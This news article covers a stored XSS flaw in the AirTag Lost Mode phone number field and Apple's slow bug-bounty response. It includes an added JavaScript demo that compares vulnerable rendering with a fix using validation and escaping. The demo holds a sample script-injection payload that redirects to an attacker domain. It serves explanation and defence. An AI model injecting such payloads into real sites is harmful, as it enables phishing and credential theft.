A simple mistake made AirTag users vulnerable to attack

Security researchers who have taken part in Apple's bug bounty program have long said that the program's responses to vulnerability reports are slow and inconsistent.

This time, the vulnerability stems from a failure to sanitize user input fields, specifically the phone number field an AirTag owner fills in to identify a lost device.

Security consultant and penetration tester Bobby Rauch discovered that Apple's AirTags, the tiny trackers that can be attached to frequently lost items such as laptops, phones or car keys, do not sanitize user input. That oversight opens the door to using AirTags as an attack vector: instead of dropping a malware-laden USB drive in a target's parking lot, an attacker can drop a maliciously prepared AirTag.

The attack does not require much technical know-how. The attacker only needs to enter a valid XSS payload in the AirTag's phone number field, put the AirTag into Lost Mode, and leave it where the target is likely to find it. In theory, scanning a lost AirTag should be a safe operation: it only opens a web page at https://found.apple.com/. The problem is that found.apple.com then embeds the contents of the phone number field into that page, unsanitized, as it is rendered in the victim's browser.

Rauch reports that the most obvious way to exploit this vulnerability is to use a simple XSS payload to pop up a fake iCloud login dialog on the victim's phone. That takes very little code.

If found.apple.com embeds such a payload in the page it serves for the scanned AirTag, the victim gets a pop-up showing the contents of badside.tld/page.html. That page could host a zero-day browser exploit or simply a phishing dialog. Rauch's scenario is a fake iCloud login dialog, which can look exactly like the real thing but sends the victim's Apple credentials to the attacker's server.
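To make the mechanism concrete, here is an added example in JavaScript; it is not Apple's code and not taken from Rauch's disclosure. It simulates a "found" page that renders an AirTag's Lost Mode contact fields, first the way the bug works (the owner-supplied phone field is concatenated straight into the HTML) and then hardened with an allow-list check on input plus HTML escaping on output. The function names, the two sample AirTag records and the exact payload are constructed for illustration; only the badside.tld/page.html destination comes from the article.

```javascript
// Added example, not Apple's code. Simulates the server-side rendering of a
// Lost Mode notice so the XSS in the phone number field can be seen and fixed.

// Constructed Lost Mode record: the attacker typed a script tag into the
// phone field. The redirect target is the domain the article mentions; the
// payload itself is illustrative (hypothetical).
const maliciousAirTag = {
  serial: 'AIRTAG-EXAMPLE-0001', // constructed serial number
  phone: "<script>window.location='https://badside.tld/page.html'</script>",
  message: 'Please call me if found',
};

// Constructed record for a legitimate owner.
const benignAirTag = {
  serial: 'AIRTAG-EXAMPLE-0002', // constructed serial number
  phone: '+1 555 123 4567',
  message: 'Reward if returned',
};

// VULNERABLE: owner-supplied fields are interpolated into HTML unescaped,
// so whatever was stored in the phone field executes in the finder's browser.
function renderFoundPageVulnerable(tag) {
  return `<p>This AirTag was lost. Contact: ${tag.phone}</p>` +
         `<p>${tag.message}</p>`;
}

// Escape the characters that change meaning in an HTML text context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Allow-list for the phone field: optional leading +, then 3..20 characters
// drawn from digits, spaces, dots, dashes and parentheses. Enforcing this when
// the owner enters the number means a payload never reaches storage.
function isValidPhoneNumber(value) {
  return /^\+?[0-9][0-9 .()\-]{2,19}$/.test(value);
}

// HARDENED: validate on input and escape on output (defense in depth, so a
// record that slipped past validation is still rendered as inert text).
function renderFoundPageSafe(tag) {
  const phone = isValidPhoneNumber(tag.phone)
    ? tag.phone
    : '(invalid contact number)';
  return `<p>This AirTag was lost. Contact: ${escapeHtml(phone)}</p>` +
         `<p>${escapeHtml(tag.message)}</p>`;
}

// Crude stand-in for the browser: would this markup start a script?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Side-by-side demonstration on the constructed records.
function demo() {
  return {
    vulnerableExecutesPayload: containsScriptTag(renderFoundPageVulnerable(maliciousAirTag)),
    safeExecutesPayload: containsScriptTag(renderFoundPageSafe(maliciousAirTag)),
    benignPhoneAccepted: isValidPhoneNumber(benignAirTag.phone),
    payloadRejected: !isValidPhoneNumber(maliciousAirTag.phone),
  };
}

console.log(demo());
```

The two-layer fix matters because the page that renders the field is not the one that accepted it: validating the phone number when the owner sets Lost Mode keeps payloads out of storage, while escaping at render time protects finders even if an older record or another input path was never validated.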

Although that is a compelling exploit, it is by no means the only one available: anything that can be done from a web page is on the table. That ranges from the simple phishing in the example above to exposing the victim's phone to a zero-click browser exploit.

More technical details, along with a short video showing the vulnerability and the network activity generated when Rauch exploits it, are available in Rauch's public disclosure on Medium.

Public disclosure after Apple's silence

According to a report by Krebs on Security, Rauch's decision to disclose the vulnerability publicly was largely due to Apple's failure to communicate, an increasingly common complaint.

Rauch told Krebs that he first reported the vulnerability to Apple privately on June 20, but over the following three months the company told him only that it was "still under investigation." That is a strange response to what looks like a very simple bug to verify and mitigate. Last Thursday, Apple emailed Rauch to say the vulnerability would be addressed in an upcoming update and asked him not to discuss it publicly in the meantime.

Apple never answered the basic questions Rauch raised, such as whether it had a timeline for fixing the bug, whether it planned to credit him for the report, and whether the report qualified for a bounty. Cupertino's lack of communication prompted Rauch to publish on Medium, even though Apple requires researchers to stay silent about their findings if they want to receive credit and/or compensation for their work.

Rauch said he was willing to work with Apple, but asked the company to "provide some details about when you plan to fix this issue and whether there will be any endorsements or bug bounties." He also warned the company that he planned to publish within 90 days. Rauch said Apple's response was "basically, if you don't divulge this, we would be very grateful."

We have contacted Apple for comments.

This story originally appeared in Ars Technica.
